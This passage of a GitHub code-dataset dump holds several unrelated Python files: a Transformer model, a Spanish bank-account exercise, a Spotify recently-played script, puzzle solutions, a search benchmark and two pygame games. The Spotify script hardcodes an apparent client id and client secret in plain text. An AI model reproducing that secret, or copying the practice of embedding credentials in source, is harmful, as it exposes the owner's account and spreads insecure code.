self.encoder(self.src_embed(src), src_mask)\n\n\ndef get_transformer(src_vocab_size, tgt_vocab_size, N, d_model, h, d_ff, dropout=0.1):\n    c = copy.deepcopy\n\n    src_embed = Embedding(d_model, src_vocab_size)\n    tgt_embed = Embedding(d_model, tgt_vocab_size)\n\n    pe = PositionalEncoding(d_model, dropout=dropout)\n\n    src_embed = nn.Sequential(src_embed, c(pe))\n    tgt_embed = nn.Sequential(tgt_embed, c(pe))\n\n    attn = MultiheadAttention(d_model, h, dropout=dropout)\n    ff = FeedForward(d_model, d_ff, dropout=dropout)\n    norm = LayerNorm(d_model)\n    su = SublayerConnection(c(norm))\n\n    encoder = Encoder(EncoderLayer(c(attn), c(ff), c(su)), c(norm), N)\n    decoder = Decoder(DecoderLayer(c(attn), c(attn), c(ff), c(su)), c(norm), N)\n\n    generator = nn.Linear(d_model, tgt_vocab_size)\n\n    model = Transformer(src_embed, tgt_embed, encoder, decoder, generator)\n\n    for name, param in model.named_parameters():\n        if param.dim() > 1:\n            nn.init.xavier_uniform_(param)\n\n    return model\n\n\ndef clone(layer, n):\n    return nn.ModuleList([copy.deepcopy(layer) for _ in range(n)])\n\n\nclass MultiheadAttention(nn.Module):\n    def __init__(self, d_model, h, dropout=0.1):\n        super(MultiheadAttention, self).__init__()\n        assert d_model % h == 0\n\n        self.h = h\n        self.d_k = d_model // h\n        self.w = clone(nn.Linear(d_model, d_model), 3)\n        self.dropout = nn.Dropout(p=dropout)\n        self.out = nn.Linear(d_model, d_model)\n\n    def forward(self, q, k, v, mask):\n        q, k, v = [rearrange(f(x), 'b s (h k) -> b h s k', h=self.h) for f, x in zip(self.w, [q, k, v])]\n        score = q @ k.transpose(-1, -2) / math.sqrt(self.d_k)\n        score = torch.masked_fill(score, mask, -1e9)\n        attn = F.softmax(score, dim=-1)\n        attn = self.dropout(attn)\n        w_v = attn @ v\n        c_v = rearrange(w_v, 'b h s k -> b s (h k)')\n        return self.out(c_v)\n\n\nclass FeedForward(nn.Module):\n    def __init__(self, d_model, d_ff, dropout=0.1):\n        super(FeedForward, self).__init__()\n        self.w_1 = nn.Linear(d_model, d_ff)\n        self.w_2 = nn.Linear(d_ff, d_model)\n        self.dropout = nn.Dropout(p=dropout)\n\n    def forward(self, x):\n        return self.w_2(self.dropout(F.gelu(self.w_1(x))))\n\n\nclass LayerNorm(nn.Module):\n    def __init__(self, d_model, eps=1e-9):\n        super(LayerNorm, self).__init__()\n        self.a_2 = nn.Parameter(torch.ones(d_model))\n        self.b_2 = nn.Parameter(torch.zeros(d_model))\n        self.eps = eps\n\n    def forward(self, x):\n        mean = x.mean(dim=-1, keepdim=True)\n        std = x.std(dim=-1, keepdim=True)\n        return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n    def __init__(self, norm, dropout=0.1):\n        super(SublayerConnection, self).__init__()\n        self.norm = norm\n        self.dropout = nn.Dropout(p=dropout)\n\n    def forward(self, x, layer):\n        return x + self.dropout(layer(self.norm(x)))\n\n\nclass Embedding(nn.Module):\n    def __init__(self, d_model, vocab_size):\n        super(Embedding, self).__init__()\n        self.embed = nn.Embedding(vocab_size, d_model)\n        self.d_model = d_model\n\n    def forward(self, x):\n        return self.embed(x) * math.sqrt(self.d_model)\n\n\nclass PositionalEncoding(nn.Module):\n    def __init__(self, d_model, max_len=50000, dropout=0.1):\n        super(PositionalEncoding, self).__init__()\n\n        pe = torch.zeros(max_len, d_model)\n        position = torch.arange(max_len).unsqueeze(1)\n        div_term = torch.exp(torch.arange(0, d_model, 2) * (-math.log(10000) / d_model))\n        pe[:, ::2] = torch.sin(position * div_term)\n        pe[:, 1::2] = torch.cos(position * div_term)\n        self.register_buffer('pe', pe.unsqueeze(0))\n        self.dropout = nn.Dropout(p=dropout)\n\n    def forward(self, x):\n        return self.dropout(x + 
self.pe[:, :x.size(1)])\n\n\ndef get_sample_data():\n    src = torch.arange(1, 101, 1).view(10, 10)\n    tgt = torch.arange(2, 102, 1).view(10, 10)\n    src_mask, tgt_mask = get_mask(src, tgt)\n    return src, tgt, src_mask, tgt_mask\n\n\ndef get_mask(src, tgt, pad_idx=0):\n    src_mask = get_pad_mask(src, pad_idx)\n    tgt_mask = get_pad_mask(tgt, pad_idx) | get_seq_mask(tgt)\n    return src_mask, tgt_mask\n\n\ndef get_seq_mask(src):\n    # mask strictly-future positions (above the main diagonal)\n    return torch.from_numpy(np.triu(np.ones((src.size(1), src.size(1))), k=1)) == 1\n\n\ndef get_pad_mask(src, pad_idx):\n    return (src == pad_idx).unsqueeze(1).unsqueeze(1)\n","repo_name":"hankyul2/ddackdae","sub_path":"practice/src/transformer2.py","file_name":"transformer2.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38695636924","text":"\r\nfrom dataclasses import dataclass\r\n\r\n@dataclass\r\nclass Cuenta:\r\n    nombre: str\r\n    dinero: float\r\n    dinero_mes_pasado: float\r\n    dinero_retirado: float\r\n    dinero_ingresado: float\r\n    numero_cuenta: int\r\n    numero_transacciones: int\r\n    \r\n\r\n\r\ncuenta1 = Cuenta(input(\"introduzca nombre propietario: \"), float(input(\"Introduzca cantidad de dinero en la cuenta: \")),float(input(\"Introduzca cantidad de dinero en la cuenta el mes pasado: \")),0,0,input(\"Introducir numero de cuenta: \"),0)\r\n\r\nn=1\r\nwhile n==1:\r\n\r\n\r\n    v1 = input(\"Desea retirar dinero de la cuenta? (1 si 0 no): \")\r\n\r\n    if v1 == \"1\":\r\n        cuenta1.dinero_retirado = float(input(\"Cuanto dinero desea retirar: \"))\r\n        cuenta1.numero_transacciones = cuenta1.numero_transacciones +1\r\n\r\n    v2 = input(\"Desea ingresar dinero de la cuenta? (1 si 0 no): \")\r\n    if v2 == \"1\" :\r\n        cuenta1.dinero_ingresado = float(input(\"Cuanto dinero desea ingresar: \"))\r\n        cuenta1.numero_transacciones = cuenta1.numero_transacciones +1\r\n\r\n\r\n\r\n\r\n\r\n    \r\n\r\n    dia = input(\"Que dia del mes es?: \")\r\n    if dia == \"1\":\r\n        cuenta1.numero_transacciones =0\r\n        cuenta1.dinero_mes_pasado = cuenta1.dinero\r\n\r\n    cuenta1.dinero = cuenta1.dinero -cuenta1.dinero_retirado + cuenta1.dinero_ingresado\r\n    cuenta1.dinero_ingresado=0\r\n    cuenta1.dinero_retirado=0\r\n\r\n    beneficios=float(input(\"Introduzca un valor y le diremos si sus beneficios respecto al mes anterior es mayor: \"))\r\n\r\n    if beneficios>(cuenta1.dinero-cuenta1.dinero_mes_pasado):\r\n        print(\"Sus beneficios no son lo suficientemente altos\")\r\n\r\n    else:\r\n        print(\"Sus beneficios son mayores a la cifra dada\")\r\n\r\n    print(\"El saldo de esta cuenta es de \"+str(cuenta1.dinero)+\" y el numero de transacciones es de \"+str(cuenta1.numero_transacciones))\r\n\r\n\r\n\r\n    n=float(input(\"Desea continuar haciendo operaciones? 
1 si 0 no: \"))\r\n\r\n\r\n\r\n","repo_name":"Jorgediamanto/Ejercicios-de-Iteraci-n","sub_path":"Ejercicios de Iteración 6.py","file_name":"Ejercicios de Iteración 6.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71943208685","text":"import requests\nimport base64\nimport spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\n\n# Spotify tokens\nid = '17e466af805745bf8a92dda2b32555c3'\nsecret = '61bec1966e0c4719aba667b20ca39ade'\nredirect = 'http://127.0.0.1:5000/'\n\n# Getting my access token\nauth_header = base64.b64encode(f\"{id}:{secret}\".encode('utf-8')).decode('utf-8')\n\nauth = requests.post(\"https://accounts.spotify.com/api/token\", \n headers={\"Authorization\": f\"Basic {auth_header}\"},\n data={\"grant_type\": \"client_credentials\"})\ntoken = auth.json()['access_token']\n\n# OAuth code\nsp_oauth = SpotifyOAuth(client_id = id,\n client_secret = secret,\n redirect_uri = redirect,\n scope='user-read-recently-played')\n\n# made api\nsp = spotipy.Spotify(auth_manager=sp_oauth)\n\n# Get recent played tracks\ntry:\n results = sp.current_user_recently_played()\n for idx, item in enumerate(results['items']):\n track = item['track']\n print(f\"{idx}: {track['artists'][0]['name']} – {track['name']}\")\nexcept Exception as e:\n print(f\"An error occurred: {str(e)}\")\n\n# # retrieve artist info\n# headers = {\"Authorization\": f\"Bearer {token}\"}\n# artist_name = \"Taylor Swift\"\n# response = requests.get(f\"https://api.spotify.com/v1/search?q={artist_name}&type=artist\", headers=headers)\n# artist_info = response.json()\n\n# # print info abt artist\n# try:\n# artists = artist_info['artists']['items']\n# for artist in artists:\n# if artist['name'].lower() == artist_name.lower():\n# print(f\"Name: {artist['name']}\")\n# print(f\"Genres: {', '.join(artist['genres'])}\")\n# print(f\"Spotify URI: {artist['uri']}\")\n# except KeyError:\n# print(\"No artist information found.\")\n","repo_name":"ClaytonKwon/HONORproject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16170717575","text":"from __future__ import annotations\nfrom typing import Generator\n\nCOLOR_WHITE = 0\nCOLOR_RED = 1\nCOLOR_BLUE = 2\n\nDIR_RIGHT = 1\nDIR_LEFT = 2\nDIR_UP = 3\nDIR_DOWN = 4\n\nREVERSED_DIR = {\n DIR_RIGHT: DIR_LEFT,\n DIR_LEFT: DIR_RIGHT,\n DIR_UP: DIR_DOWN,\n DIR_DOWN: DIR_UP,\n}\n\n\ndef main():\n N, K = map(int, input().split())\n A = [list(map(int, input().split())) for _ in range(N)]\n simulator = Simulator(N, A)\n for _ in range(K):\n r, c, d = map(int, input().split())\n simulator.add_piece(r, c, d)\n\n answer = simulator.simulate(limit=1000)\n if answer:\n print(answer)\n else:\n print(-1)\n\n\nclass Simulator(object):\n def __init__(self, N: int, A: list[int]) -> None:\n self.N: int\n self.color: int\n self.pieces: list[Piece]\n self.root: list[list[Piece]]\n\n self.N = N\n self.color = A\n self.pieces = []\n self.root = [[None] * (N+1) for _ in range(N+1)]\n\n def add_piece(self, r: int, c: int, d: int) -> None:\n piece = Piece(r, c, d)\n self.pieces.append(piece)\n self.put_down(piece, r, c)\n\n def simulate(self, limit: int) -> int:\n for t in range(1, limit+1):\n for piece in self.pieces:\n self.do_turn(piece)\n if self.count_pieces(piece.row, piece.col) >= 4:\n return t\n return None\n\n def do_turn(self, piece: Piece) -> None:\n r, c = piece.row, 
piece.col\n nr, nc = self.get_next_pos(r, c, piece.dir)\n color = self.get_cell_color(nr, nc)\n if color == COLOR_WHITE:\n self.pick_up(piece)\n self.put_down(piece, nr, nc)\n elif color == COLOR_RED:\n self.pick_up(piece)\n piece = self.reverse(piece)\n self.put_down(piece, nr, nc)\n elif color == COLOR_BLUE:\n piece.dir = REVERSED_DIR[piece.dir]\n nr, nc = self.get_next_pos(r, c, piece.dir)\n if self.get_cell_color(nr, nc) != COLOR_BLUE:\n self.do_turn(piece)\n\n def get_next_pos(self, r: int, c: int, d: int) -> tuple[int, int]:\n nr = r + {DIR_UP: -1, DIR_DOWN: 1}.get(d, 0)\n nc = c + {DIR_LEFT: -1, DIR_RIGHT: 1}.get(d, 0)\n return nr, nc\n\n def get_cell_color(self, r: int, c: int) -> int:\n if 1 <= r <= self.N and 1 <= c <= self.N:\n return self.color[r-1][c-1]\n return COLOR_BLUE\n\n def pick_up(self, piece: Piece) -> None:\n r, c = piece.row, piece.col\n if self.root[r][c] is piece:\n self.root[r][c] = None\n else:\n lower = piece.lower\n piece.lower = None\n lower.upper = None\n\n def put_down(self, piece: Piece, r: int, c: int) -> None:\n for p in piece.iter_up():\n p.row = r\n p.col = c\n if self.root[r][c] is None:\n self.root[r][c] = piece\n else:\n lower = self.root[r][c].get_top()\n piece.lower = lower\n lower.upper = piece\n\n def reverse(self, bottom_piece: Piece) -> Piece:\n pieces = list(bottom_piece.iter_up())\n for piece in pieces:\n piece.upper, piece.lower = piece.lower, piece.upper\n return pieces[-1]\n\n def get_upper_sequence(self, piece: Piece) -> list[Piece]:\n pieces = []\n cur = piece\n while cur:\n pieces.append(cur)\n cur = cur.upper\n return pieces\n\n def count_pieces(self, r: int, c: int) -> int:\n root = self.root[r][c]\n return root.get_height() if root else 0\n\n\nclass Piece(object):\n def __init__(self, r: int, c: int, d: int) -> None:\n self.row: int\n self.col: int\n self.dir: int\n self.upper: Piece\n self.lower: Piece\n\n self.row = r\n self.col = c\n self.dir = d\n self.upper = None\n self.lower = None\n\n def __repr__(self) -> str:\n return f\"Piece({self.row}, {self.col}, {self.dir}, {self.get_height()})\"\n\n def get_height(self) -> int:\n if not self.upper:\n return 1\n return 1 + self.upper.get_height()\n\n def get_top(self) -> Piece:\n if not self.upper:\n return self\n return self.upper.get_top()\n\n def iter_up(self) -> Generator[Piece]:\n cur = self\n while cur:\n yield cur\n cur = cur.upper\n\n\nmain()\n","repo_name":"DoubleJONY/KDJ-algorithm-challenge","sub_path":"heoh/boj-17837.py","file_name":"boj-17837.py","file_ext":"py","file_size_in_byte":4379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"70203564847","text":"import random\nimport time\nimport os\nimport sys\nsys.path.append('../pysos')\nimport pysos\nimport finder\nimport psutil\nimport gc\nimport pickle\nimport cProfile\nfrom finder import Hit\n\n\n\ndef RAM(obj):\n temp = obj._collection\n obj._collection = None\n size = len(pickle.dumps(obj)) / 1024 / 1024\n obj._collection = temp\n return size\n \nstart = time.time()\n\nFILE = 'omdb_10k.sos'\ndb = pysos.List(FILE)\n\nprint(\"%.2fs: %d items loaded\" % (time.time() - start, len(db)))\n\n#cProfile.run('finder = finder.Finder(db)')\n\nfinder = finder.Finder(db, FILE + '.idx')\n\nprint(\"%.2fs\" % (time.time() - start))\nprint(\"%.2fs: %d indexed words\" % (time.time() - start, len(finder._voc)) )\n#print(\"%.2fs: RAM: %.2f mb\" % (time.time() - start, RAM(finder)) )\nprint(\"%.2fs\" % (time.time() - start))\n\nf = finder\ndb.observe(f.update)\n\ndb[111] = {'foo': 
'testtest'}\n\nres = f.search('testtest')\nprint(res)\n\nprint(\"---------------\")\n\nstart = time.time()\nres = f.search('alice') \ncProfile.run(\"res = f.search('alice')\")\nprint(len(res))\nprint(\"%.2fs normal search\" % (time.time() - start))\n\nstart = time.time()\nres = f.search_old('the')\nprint(\"%.2fs old search\" % (time.time() - start))\n\n\nstart = time.time()\n#res = f.find('ali', exact=False, weights={'Title':1})\n#cProfile.run(\"res = f.search('the')\")\nres = f.search('the')\n#print(next(res))\nprint(\"%.2fs normal search\" % (time.time() - start))\n\n\nstart = time.time()\nres = f.search_old('the')\nprint(\"%.2fs old search\" % (time.time() - start))","repo_name":"dagnelies/finder","sub_path":"test_omdb.py","file_name":"test_omdb.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"30302850372","text":"#https://leetcode.com/problems/longest-increasing-path-in-a-matrix/description/\ndef main():\n\n\tA = [\n\t [9,9,4],\n\t [6,6,8],\n\t [2,1,1]\n\t]\n\n\tmatrix = {row_index + column_index*1j: value\n\t\t\t\tfor row_index, row in enumerate(A) for column_index, value in enumerate(row)}\n\n\tlength = dict.fromkeys(matrix.keys(), 1)\n\n\tfor z in sorted(matrix, key=matrix.get):\n\t\tlength[z] = 1 + max([\n\t\t\t\t\t\tlength[Z] for Z in (z+1, z-1, z+1j, z-1j)\n\t\t\t\t\t\tif Z in matrix and matrix[z] > matrix[Z]\n\t\t\t\t\t\t] or [0])\n\tprint(max(length.values() or [0]))\n\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Irunyards/Leetcode_hard","sub_path":"longest_increasing_path_in_a_matrix.py","file_name":"longest_increasing_path_in_a_matrix.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13622544958","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\n\r\nimport pygame\r\nfrom pygame.locals import *\r\n\r\nfrom Config import *\r\nfrom Config_joueur import *\r\nfrom Carte import *\r\nfrom Perso import *\r\nfrom Bot import*\r\nfrom Bombe import*\r\nfrom random import*\r\nclass Jeu:\r\n \"\"\"Classe permettant de gérer le jeu\"\"\"\r\n\r\n def __init__(self, fenetre, nb_perso, nb_bots, nomCarte):\r\n self.fenetre = fenetre\r\n self.duree = 3 * 60\r\n\r\n # On affiche la carte\r\n self.carte = Carte(nomCarte)\r\n self.carte.charger()\r\n self.carte.tableau()\r\n self.tableau = self.carte.tableau\r\n self.carte.afficher(self.fenetre)\r\n\r\n\r\n\r\n # On créer les personnage\r\n\r\n # On créer les personnages\r\n\r\n for perso in range(nb_perso):\r\n Perso(self.carte)\r\n # On créer les bots\r\n for bot in range(nb_bots):\r\n Bot(self.carte)\r\n\r\n self.partieEnCours = True\r\n\r\n # Boucle du jeu\r\n while self.partieEnCours:\r\n self.carte.TableauAJour()\r\n #Limite des FPS\r\n pygame.time.Clock().tick(fenetre_FPS)\r\n\r\n # On verifie si la partie est finie\r\n if(self.verif_finPartie()):\r\n # On arrete la partie\r\n self.partieEnCours = False\r\n\r\n # On affiche un fond transparant sur la carte\r\n fond_transparant = pygame.Surface((self.carte.taille[0] * taille_sprite, self.carte.taille[1] * taille_sprite), pygame.SRCALPHA)\r\n fond_transparant.fill((255,255,255,64))\r\n self.fenetre.blit(fond_transparant, (origine_gameX, origine_gameY))\r\n pygame.display.flip()\r\n\r\n # On attend 3 secondes\r\n pygame.time.delay(3000)\r\n break\r\n\r\n # On remplie l'écran en noir\r\n self.fenetre.fill((0, 0, 0))\r\n\r\n for event in pygame.event.get():\r\n\r\n if 
event.type == QUIT:\r\n                    self.partieEnCours = False\r\n                elif event.type == KEYDOWN:\r\n                    # On vérifie pour tous les personnages vivants si la touche bombe est pressée\r\n                    for perso in self.carte.liste_perso:\r\n                        if(perso.vivant):\r\n                            if event.key == KEY_perso[perso.id_local]['bombe']:\r\n                                # Le personnage pose une bombe\r\n                                perso.poserBombe()\r\n\r\n            # On vérifie pour tous les personnages vivants\r\n\r\n\r\n            for perso in self.carte.liste_perso:\r\n                if(perso.vivant):\r\n                    # Si une touche de déplacement est pressée, alors le personnage se déplace\r\n                    touchePressee = pygame.key.get_pressed()\r\n                    if(touchePressee[KEY_perso[perso.id_local]['haut']]):\r\n                        perso.deplacer('HAUT')\r\n                    elif(touchePressee[KEY_perso[perso.id_local]['bas']]):\r\n                        perso.deplacer('BAS')\r\n                    elif(touchePressee[KEY_perso[perso.id_local]['gauche']]):\r\n                        perso.deplacer('GAUCHE')\r\n                    elif(touchePressee[KEY_perso[perso.id_local]['droite']]):\r\n                        perso.deplacer('DROITE')\r\n\r\n            for bot in self.carte.liste_bot:\r\n                if (bot.vivant):\r\n                    bot.deplacer(self.carte, self.tableau)\r\n                    r = randint(1,15)\r\n                    if r >= 12 :\r\n                        bot.poserBombe()\r\n\r\n            # On met a jour les chronomètres\r\n            self.carte.liste_bombe.update()\r\n            self.carte.liste_explosion.update()\r\n            self.duree -= 0.0333  # décompte d'environ 1/30 de seconde par frame\r\n\r\n            # On met à jour la carte\r\n            self.carte.afficher(self.fenetre)\r\n\r\n            # On affiche le chronomètre de la partie\r\n            self.afficherTemps()\r\n\r\n            #Rafraichissement\r\n            pygame.display.flip()\r\n\r\n    def verif_finPartie(self):\r\n        \"Vérifie si une partie est finie\"\r\n        # S'il ne reste qu'un adversaire, il a gagné\r\n        if(len(self.carte.liste_perso)) + (len(self.carte.liste_bot)) == 1:\r\n            self.finPartie_victoire()\r\n            return True\r\n        # Si tout le monde est mort, ça fait égalité\r\n        elif(len(self.carte.liste_perso))+ (len(self.carte.liste_bot)) == 0:\r\n            self.finPartie_egualite()\r\n            return True\r\n\r\n        # Si le chronomètre de la partie est terminé, ça fait égalité\r\n        if(self.duree <= 0):\r\n            self.finPartie_egualite()\r\n            return True\r\n\r\n    def finPartie_victoire(self):\r\n        \"Affiche le texte de victoire au milieu de l'écran\"\r\n        font = pygame.font.Font(None, 96)\r\n\r\n        if(len(self.carte.liste_perso) != 0):\r\n            for perso in self.carte.liste_perso:\r\n                vainqueur = \"Joueur {0}\".format(perso.id_local)\r\n        else:\r\n            vainqueur = \"Bot\"\r\n\r\n        texte = \"Victoire du {0}\".format(vainqueur)\r\n        text = font.render(texte, 1, (250, 250, 250))\r\n        self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((taille_fenetre[1]/2)-(font.size(texte)[1]/2))))\r\n\r\n    def finPartie_egualite(self):\r\n        \"Affiche le texte d'égalité au milieu de l'écran\"\r\n        font = pygame.font.Font(None, 96)\r\n        texte = \"Égalité\"\r\n        text = font.render(texte, 1, (250, 250, 250))\r\n        self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((taille_fenetre[1]/2)-(font.size(texte)[1]/2))))\r\n\r\n    def afficherTemps(self):\r\n        \"Affiche le chronomètre de la partie\"\r\n        font = pygame.font.Font(None, 32)\r\n        texte = \"{:02.0f}:{:02.0f}\".format(self.duree//60, self.duree%60)\r\n        text = font.render(texte, 1, (250, 250, 250))\r\n        self.fenetre.blit(text, ((taille_fenetre[0]/2)-(font.size(texte)[0]/2), ((origine_gameY/2)-(font.size(texte)[1]/2))))\r\n","repo_name":"nithramus/42","sub_path":"pour git/Version finale avec bot/Jeu.py","file_name":"Jeu.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"70203564847","text":"from pygame import image\nfrom 
global_variables import *\nimport pygame\nfrom User_character import Character\nfrom Obstacles import Helicopter, Building, Present\nimport time\nimport random\n\n#T_ODO: Change player jump\n#T_ODO: Add score and lifes text\n#T_ODO: Add hitboxes to obstacles\n#TODO: Make presents' code\n#TODO: Add background music\n#TODO: Add hop sound effect on movement\n#TODO: Make respawn animation\n#TODO: Make helicopter animation\n#TODO: Add lost screen to quit game or redirect to main menu\n#TODO: Main menu:\n# - Game name\n# - Background animation\n# - Change character (selector)\n# - Set name\n\n\ndef isQuit():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n\n\ndef isDeadFromCollision():\n sentinel = False\n if len(obstacles_in_scene[0]) > 0:\n for helicopter in obstacles_in_scene[0]:\n # print(\"Helicopter: \", helicopter.rect.x, helicopter.rect.y, \" | User: \", user.rect.x, user.rect.y)\n if user.rect.colliderect(helicopter.rect):\n sentinel = True\n \n if len(obstacles_in_scene[2]) > 0:\n for building in obstacles_in_scene[2]:\n #print(\"Building: \", building.rect.x, building.rect.y, \" | User: \", user.rect.x, user.rect.y)\n if user.rect.colliderect(building.rect):\n sentinel = True\n \n if user.hasColided == True and sentinel == True:\n pass\n elif user.hasColided == True and sentinel == False:\n user.hasColided = False\n return sentinel\n elif user.hasColided == False and sentinel == True:\n user.hasColided = True\n return sentinel\n\n\ndef hasObtainedPoints():\n if len(obstacles_in_scene[1]) > 0:\n for present in obstacles_in_scene[1]:\n if user.rect.colliderect(present.rect):\n user.score += 1\n present.showImage = False\n \n return True\n\n\ndef isDeadFromFloorBang():\n if user.y >= screen_height-user.height:\n return True\n \n return False\n\n\ndef islifeLost():\n global lifeLost_value\n isDeadFromFloorBang_value = isDeadFromFloorBang()\n isDeadFromCollision_value = isDeadFromCollision()\n \n if isDeadFromFloorBang_value:\n if user.lifes > 0:\n user.respawnAnimation\n user.lifes -= 1\n lifeLost_value = True\n #TO REMOVE AFTER ANIMATION COMPLETED\n time.sleep(1)\n user.x, user.y = user.initial_x, user.initial_y\n user.rect.x, user.rect.y = user.initial_x, user.initial_y\n #######\n print(\"isDeadFromFloorBang\")\n\n elif isDeadFromCollision_value:\n user.lifes -= 1\n lifeLost_value = True\n user.blinkAnimation\n print(\"isDeadFromCollision\")\n\n return isDeadFromFloorBang_value and isDeadFromCollision_value\n\n\ndef create_obstacles():\n helicopter_height = str(random.randint(0,3))\n building_height = str(random.randint(0,3))\n showPresent = True if random.randint(0,10) == 3 else False\n\n if helicopter_height == \"3\" and building_height == \"3\":\n if random.randint(0,1) == 0:\n helicopter_height = \"1\"\n else:\n building_height = \"1\"\n\n elif helicopter_height == \"3\" and building_height == \"2\":\n building_height = \"1\"\n\n elif helicopter_height == \"2\" and building_height == \"3\":\n helicopter_height = \"1\"\n\n present_y_position = (heightConverter[helicopter_height] + (screen_height - heightConverter[building_height])) / 2 - 100\n\n #sentinel_helicopter=obstacles_in_scene[0]\n #sentinel_present=obstacles_in_scene[1] if showPresent\n #sentinel_building=obstacles_in_scene[2]\n\n #sentinel_helicopter = str(sentinel_helicopter)\n #sentinel_present = str(sentinel_present)\n #sentinel_building = str(sentinel_building)\n\n obstacles_in_scene[0].append(Helicopter(helicopter_height, pygame.Rect(screen_width, 0, 100, 
heightConverter[helicopter_height])))\n    obstacles_in_scene[2].append(Building(building_height, pygame.Rect(screen_width, screen_height - heightConverter[building_height], 100, heightConverter[building_height])))\n    #if showPresent:\n    obstacles_in_scene[1].append(Present(present_y_position, pygame.Rect(screen_width, present_y_position, 100, 100)))\n\n\ndef move():\n    global sentinelSpeed\n\n    dummie = pygame.key.get_pressed()\n    if dummie[pygame.K_UP] and user.jumping_animation_duration_timer == 0:\n        user.y -= user.jump_speed\n        user.rect.y -= user.jump_speed\n        if user.y < 10:\n            user.y = 10\n            user.rect.y = 10\n        user.jumping_animation_duration_timer = user.jumping_animation_duration\n        #sentinelSpeed = user.speed\n    \n    elif user.jumping_animation_duration_timer > 0:\n        \n        if user.jumping_animation_duration_timer >= user.jumping_animation_duration_halved:\n            user.y -= user.speed / fps / 4*3\n            user.rect.y -= user.speed / fps / 4*3\n            if user.y < 10:\n                user.y = 10\n                user.rect.y = 10\n        else:\n            #Code to make a slow fall animation\n            user.y += user.speed / fps / 4\n            user.rect.y += user.speed / fps / 4\n        \n        user.jumping_animation_duration_timer -= 1\n    \n    else:\n        user.y += gravity\n        user.rect.y += gravity\n\n    user.rect.y = user.y\n    #print(user.rect.y, user.y)\n\n\ndef move_scene():\n    #Move obstacles\n    if len(obstacles_in_scene[0]) > 0:\n        for helicopter in obstacles_in_scene[0]:\n            helicopter.rect.x -= obstacle_speed\n            helicopter.x -= obstacle_speed\n    \n    if len(obstacles_in_scene[1]) > 0:\n        for present in obstacles_in_scene[1]:\n            present.rect.x -= obstacle_speed\n            present.x -= obstacle_speed\n    \n    if len(obstacles_in_scene[2]) > 0:\n        for building in obstacles_in_scene[2]:\n            building.rect.x -= obstacle_speed\n            building.x -= obstacle_speed\n\n\ndef load_window():\n    global lifeLost_value\n    screen.blit(background_image, (0,0))\n    screen.blit(user_character, (user.x, user.y))\n    screen.blit(lifes_font, (screen_width - 200, 20))\n    screen.blit(score_font, (screen_width - 200, 90))\n    if lifeLost_value:\n        screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n        lifeLost_value = False\n    #screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n    \n    if len(obstacles_in_scene[0]) > 0:\n        for helicopter in obstacles_in_scene[0]:\n            screen.blit(helicopter.helicopter_obstacle, (helicopter.x, helicopter.y))\n    \n    if len(obstacles_in_scene[1]) > 0:\n        for present in obstacles_in_scene[1]:\n            if present.showImage:\n                screen.blit(present.present_obstacle, (present.x, present.y))\n    \n    if len(obstacles_in_scene[2]) > 0:\n        for building in obstacles_in_scene[2]:\n            screen.blit(building.building_obstacle, (building.x, building.y))\n\n    pygame.display.update()\n\n\ndef showEndScreen():\n    lifes_font = font.render('Lifes: 0', True, (255,255,255))\n    screen.blit(lifes_font, (screen_width - 200, 20))\n    screen.blit(pygame.image.load(\"assets/images/end_screen.png\"), (0,0))\n    screen.blit(game_over_font, (screen_width/2-400,screen_height/2-100))\n    \n    pygame.display.update()\n    while True:\n        isQuit()\n\n\ndef game():\n    global current_obstacle_frame_separation\n    global obstacle_frame_separation\n    global lifes_font, score_font\n    #time.sleep(2)\n\n    while user.lifes > 0:\n        clock.tick(fps)\n        lifes_font = font.render(f'Lifes: {user.lifes}', True, (255,255,255))\n        score_font = font.render(f'Score: {user.score}', True, (255,255,255))\n        \n        if current_obstacle_frame_separation == obstacle_frame_separation:\n            create_obstacles()\n            current_obstacle_frame_separation = 0\n        \n        current_obstacle_frame_separation += 1\n        move()\n        
move_scene()\n islifelost_var = islifeLost()\n load_window()\n hasObtainedPoints()\n \n if islifelost_var and user.lifes != 0:\n time.sleep(1)\n\n isQuit()\n \n showEndScreen()\n\n\nif __name__ == \"__main__\":\n pygame.init()\n pygame.font.init()\n font = pygame.font.SysFont(None, 50)\n font2 = pygame.font.SysFont(None, 200)\n game_over_font = font2.render('GAME OVER', True, (255,0,0))\n\n #Window adjustments\n pygame.display.set_caption(\"XMAS ADVENTURES\")\n screen = pygame.display.set_mode((screen_width, screen_height))\n\n #Set scene\n user = Character(\"anmabe\", \"melchor\")\n user.rect = pygame.Rect(user.x, user.y, user.width, user.height)\n user_character = pygame.image.load(user.character_image)\n background_image = pygame.image.load('assets/images/background.jpg')\n\n clock = pygame.time.Clock()\n\n #Background music\n #pygame.mixer.music.load('foo.mp3')\n #pygame.mixer.music.play(-1)\n\n game()","repo_name":"anmabe06/XMas-adventures","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} 